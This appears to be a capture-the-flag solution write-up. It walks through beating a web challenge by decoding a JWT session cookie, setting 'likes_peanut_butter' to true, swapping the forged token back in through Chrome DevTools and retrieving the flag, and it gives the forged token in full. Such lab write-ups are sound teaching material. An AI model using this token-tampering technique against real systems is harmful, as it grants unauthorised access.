2.0 KiB
How To Solve
This time, simply modifying the URL doesn't help.
When you push the 'retrieve' button on the /profile page, you get a message telling you that you can only get the best brand when you like peanut butter. A quick look at the Chrome DevTools Network tab shows that this information is the result of a GET request to the server after the button click. Under the request header, you can see that a cookie named token
is sent along. This is interesting.
When visiting the /profile page, a GET request for profile information is made to the server. The server responds with the information but also requires the browser to set a cookie. That cookie is a JSON Web Token (JWT) with the name token
in this case. You can use the Chrome DevTools to inspect the cookie. You can see that the cookie has the value
. You can simple decode this JWT, using an online tool.
The obtained JSON is:
"role": "CTF Participant",
"likes_peanut_butter": false
In this tool, modify the JSON by setting likes_peanut_butter
to true
(this was the requirement for obtaining the 'best brand'). You now get a new JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6dHJ1ZX0.Ndo_jZn8fFltuKiZK9lyVoXyLuiueaPLUmuC7_0Y8j8
In you Chrome DevTools, you can change the token
cookie to the new JWT. Now, simply push the 'retrieve' button again to obtain the flag. Note that you should not refresh the page. That would result in a new GET request to obtain profile information and override the flag again to the old flag.